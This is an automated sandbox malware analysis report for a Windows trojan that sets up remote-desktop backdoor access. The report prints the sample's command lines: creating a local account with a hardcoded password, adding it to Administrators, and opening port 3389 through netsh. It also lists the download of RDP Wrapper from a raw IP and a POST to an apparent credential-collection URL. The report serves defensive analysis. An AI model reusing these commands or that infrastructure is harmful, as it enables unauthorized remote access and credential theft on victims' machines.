Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hloRQZmlfg.exe

Overview

General Information

Sample name:hloRQZmlfg.exe
renamed because original name is a hash value
Original sample name:cee4e023e6afaaa51f600caec3469215.exe
Analysis ID:1528586
MD5:cee4e023e6afaaa51f600caec3469215
SHA1:bf2ceff1f19f09a70863d1f8c7be0fa9662b3b04
SHA256:da52143dd6a13c1ea3e24e735f64938830e2a3160ae08989629a43e5020d1173
Tags:32exetrojan
Infos:

Detection

RDPWrap Tool
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a new user with administrator rights
Allows multiple concurrent remote connection
Enables remote desktop connection
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: RDP Sensitive Settings Changed
Uses netsh to modify the Windows network and firewall settings
Yara detected Costura Assembly Loader
Yara detected RDPWrap Tool
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to enumerate running services
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: New User Created Via Net.EXE
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • hloRQZmlfg.exe (PID: 2444 cmdline: "C:\Users\user\Desktop\hloRQZmlfg.exe" MD5: CEE4E023E6AFAAA51F600CAEC3469215)
    • cmd.exe (PID: 432 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 5368 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 1036 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 504 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RDPWInst.exe (PID: 1564 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)
        • netsh.exe (PID: 2344 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 2112 cmdline: "cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1980 cmdline: net user RDPUser_1e47a393 GEdtvn58rfdr /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 5592 cmdline: C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 4700 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 6464 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 4268 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 6712 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • netsh.exe (PID: 1856 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 2464 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_1e47a393 /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1628 cmdline: net localgroup "Administrators" RDPUser_1e47a393 /add MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6356 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • WerFault.exe (PID: 1512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)
  • tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
hloRQZmlfg.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
      C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000008.00000000.1434233686.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                  Click to see the 3 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.hloRQZmlfg.exe.880000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    8.2.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                      8.2.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        8.0.RDPWInst.exe.400000.0.unpackJoeSecurity_RDPWrapToolYara detected RDPWrap ToolJoe Security
                          8.0.RDPWInst.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Outbound RDP Connections Over Non-Standard Tools
                            Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\hloRQZmlfg.exe, Initiated: true, ProcessId: 2444, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49711
                            Sigma detected: RDP Sensitive Settings Changed
                            Source: Registry Key setAuthor: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 1564, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll
                            Sigma detected: Execution of Suspicious File Type Extension
                            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys
                            Sigma detected: New User Created Via Net.EXE
                            Source: Process startedAuthor: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user RDPUser_1e47a393 GEdtvn58rfdr /add, CommandLine: net user RDPUser_1e47a393 GEdtvn58rfdr /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2112, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_1e47a393 GEdtvn58rfdr /add, ProcessId: 1980, ProcessName: net.exe
                            Sigma detected: Local Accounts Discovery
                            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 432, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 5368, ProcessName: net.exe
                            Sigma detected: Net.exe Execution
                            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 432, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 5368, ProcessName: net.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-10-08T03:23:43.830864+020028033053Unknown Traffic192.168.2.849710104.26.12.20580TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: hloRQZmlfg.exeAvira: detected
                            Multi AV Scanner detection for domain / URL
                            Source: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exeVirustotal: Detection: 22%Perma Link
                            Source: http://147.45.44.104Virustotal: Detection: 20%Perma Link
                            Multi AV Scanner detection for dropped file
                            Source: C:\Program Files\RDP Wrapper\rdpwrap.dllReversingLabs: Detection: 54%
                            Source: C:\Program Files\RDP Wrapper\rdpwrap.dllVirustotal: Detection: 56%Perma Link
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeReversingLabs: Detection: 68%
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeVirustotal: Detection: 77%Perma Link
                            Multi AV Scanner detection for submitted file
                            Source: hloRQZmlfg.exeReversingLabs: Detection: 63%
                            Source: hloRQZmlfg.exeVirustotal: Detection: 71%Perma Link
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: hloRQZmlfg.exeJoe Sandbox ML: detected
                            Source: hloRQZmlfg.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.2
                            Source: hloRQZmlfg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbIs>b source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Xml.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: costura.costura.pdb.compressedlB source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.DirectoryServices.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: costura.costura.pdb.compressed source: hloRQZmlfg.exe
                            Source: Binary string: System.Configuration.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
                            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Configuration.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Xml.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
                            Source: Binary string: tem.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Core.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.DirectoryServices.pdb4 source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.DirectoryServices.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Management.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: rdpclip.pdbJ source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: mscorlib.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Management.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: HPJo0C:\Windows\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919019826.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
                            Source: Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
                            Source: Binary string: System.Core.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: <>c__DisplayClass0_0<>9__5_0<GetTotalDiskSpace>b__5_0<GenerateRandomPassword>b__0<>u__1IEnumerable`1Task`1TaskAwaiter`10xb11a1ToInt32<>u__2Func`2Dictionary`2ToInt64<Main>d__5get_UTF8<>9<Module><Main>U3lzdGVtSW5mb0FBQ2xpZW50QUFBUkRQSW5zdGFsbGVyQUFBUHJvZ3JhbUFBQXNzZW1ibHlMb2FkZXJBUkRQQ3JlYXRvcl9Qcm9jZXNzZWRCeUZvZHlBGetTotalRAMSystem.IOGetPublicIP_Costuracostura.metadatamscorlib<>cSystem.Collections.GenericDiscoverDeviceAsyncDownloadFileTaskAsyncCreatePortMapAsyncReadLoadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.system.diagnostics.diagnosticsource.dll.compressedcostura.open.nat.dll.compressedget_ConnectedAwaitUnsafeOnCompletedget_IsCompletedSystem.Collections.SpecializedNewGuidReadToEndExecuteCommandcommandFindGenerateRandomPasswordpasswordReplaceGetTotalDiskSpaceNatDeviceCancellationTokenSourcesourceset_ModePaddingModeCompressionModeCipherModeRangeExchangenullCacheInvokeIEnumerableIDisposableget_AsyncWaitHandleDownloadFileGetOSNameGetGPUNameget_Nameget_MachineNamefullNameGetAdminGroupNameuserNameGetProcessorNameGetNamerequestedAssemblyNameusernameWaitOneCombineIAsyncStateMachineSetStateMachinestateMachineValueTypeSystem.CorecultureDisposeCreate<>1__stateWriteCompilerGeneratedAttributeDebuggableAttributeAsyncStateMachineAttributeTargetFrameworkAttributeDebuggerHiddenAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteTryGetValuedriveadd_AssemblyResolveRDPCreator.exeSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningMappingFromBase64StringDownloadStringCultureToStringGetStringSubstringAttachComputeHashzipPathGetTempPathpathget_LengthlengthEndsWithUriAsyncCallbacknullCacheLockTransformFinalBlockget_TaskProtocolzipUrlserverUrlurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamget_Itemset_ItemSystemSymmetricAlgorithmHashAlgorithmTrimRandomrandomICryptoTransformSumTimeSpanIsPortOpenget_ChildrenRDPCreator.cMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.ReflectionNameValueCollectionManagementObjectCollectionset_PositionSetExceptionStringComparisonusernamePatternpatternCopyToget_CultureInfoProcessStartInfoAddUserToAdminGroupAddUserToRemoteDesktopGroupSystem.LinqClearStreamReaderTextReaderMD5CryptoServiceProviderTripleDESCryptoServiceProviderAsyncTaskMethodBuilder<>t__buildersenderManagementObjectSearcherResolveEventHandlerPortMapperInstallRDPWrapperNatDiscovererCheckForRDPUserCreateAdminUserTaskAwaiterGetAwaiterEnterRDPCreator.ctor.cctorMonitorCreateDecryptorSystem.DiagnosticsFromMillisecondsSystem.Runtime.CompilerServicesSystem.DirectoryServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesDirectoryEntriesresourceNamessymbolNamesassemblyNamesGetBytesUploadValuesget_FlagsAssemblyNameFlagsResolveEventArgsargsSystem.Threading.TasksSendCredentialsEqualsContainsSystem.Collectionsget_CharsProcessSystem.Net.SocketsExistsOpen.NatConcatManagementBaseObjectManagementObjectSelectBegin
                            Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: hloRQZmlfg.exe
                            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: 00000000000000000400000000000000g.PDB source: hloRQZmlfg.exe, 00000000.00000002.1923069816.0000000006B90000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Core.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_004092D8 FindFirstFileW,FindClose,8_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0040F73C FindFirstFileW,FindClose,8_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,8_2_00408EB9

                            Networking

                            barindex
                            Yara detected RDPWrap Tool
                            Source: Yara matchFile source: 8.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000000.1434308891.0000000000450000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RDPWInst.exe PID: 1564, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.8:49711 -> 8.46.123.33:3389
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 01:23:04 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 193Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                            Source: Joe Sandbox ViewASN Name: AS-PUBMATICUS AS-PUBMATICUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: api.ipify.org
                            Source: unknownDNS query: name: api.ipify.org
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 104.26.12.205:80
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
